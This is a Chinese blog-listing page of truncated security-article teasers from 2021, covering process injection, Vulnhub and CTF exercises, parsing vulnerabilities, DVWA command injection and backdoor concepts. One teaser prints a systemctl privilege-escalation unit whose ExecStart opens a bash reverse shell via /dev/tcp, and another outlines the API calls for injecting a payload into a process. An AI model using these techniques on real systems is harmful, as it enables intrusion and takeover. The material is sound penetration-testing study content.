首先我们来看下进程程注入的核心逻辑(不考虑寻找目标进程、不考虑注入内容的执行) /* 注入恶意Payload: OpenProcess 可以打开目标进程 VirtualAllocEx 在目标进程中分配一块内存区域 WriteProcessMemory 在刚刚分配的内存区域中写入恶意的Payload ...
分类:
其他好文 时间:
2021-07-26 16:55:06
阅读次数:
0
听说练习Vulnhub靶机,可以提升一些提权的小技巧,前来练习。 先使用nmap扫描一下,知道了靶机IP地址,以及开放的端口服务(ftp、ssh、http) 访问http服务看看有没有什么可以GetWebshell的点,但是有点空没啥可以利用的 于是使用dirsearch工具扫描后台目录,发现有一个 ...
分类:
其他好文 时间:
2021-06-05 18:03:23
阅读次数:
0
0x00 前言 什么是解析漏洞?为什么要学习解析漏洞?顾名思义,解析漏洞是服务器解析时产生的漏洞,是拿webshell时的关键点,如果网站存在解析漏洞,可显著增大hacker们的攻击面,而且,了解了解析漏洞,也会对文件上传,文件包含这类基础漏洞有更深的理解,比如有人做题不明白只是加了个\x00就让图 ...
分类:
Web程序 时间:
2021-06-02 11:19:05
阅读次数:
0
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:
其他好文 时间:
2021-05-24 14:55:34
阅读次数:
0
题目来源:su-ctf-quals-2014题目描述:解密这段信息! 下载附件,内容如下 The life that I have Is all that I have And the life that I have Is yours. The love that I have Of the li ...
分类:
其他好文 时间:
2021-05-24 08:42:04
阅读次数:
0
20181224《网络攻防技术》Exp7 网络欺诈防范 相关知识点总结 ARP Spoofing ARP缓存机制 static:在windows下使用arp -s静态查询IP与MAC地址的对应关系 Dynamic:根据ARP应该更新 ARP动态更新的机制:广播请求,单波应答。ARP应答包并非都是请求 ...
分类:
其他好文 时间:
2021-05-24 06:10:04
阅读次数:
0
HTTP响应码 200 存在文件 403 存在文件及 3xx可能存在 404 不存在文件及文件夹 500 均可能存在 burpsuite抓取https 墨者学院网址 火狐浏览器,添加插件 hackbar2 php投票伪造 修改forward burpsuite 抓包——右键——send to int ...
分类:
Web程序 时间:
2021-05-03 13:00:58
阅读次数:
0
Low 命令注入Low级别的,我们先看一下源码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping comma ...
分类:
其他好文 时间:
2021-05-03 12:31:22
阅读次数:
0
1.simple_php ?<?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ ...
分类:
其他好文 时间:
2021-04-20 14:34:36
阅读次数:
0
1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 -- 下面是近些年的一些例子: 编译器:苹果Xcode后门事件。苹果Xcode后门事件中招的APP包括 ...
分类:
其他好文 时间:
2021-03-30 13:03:51
阅读次数:
0
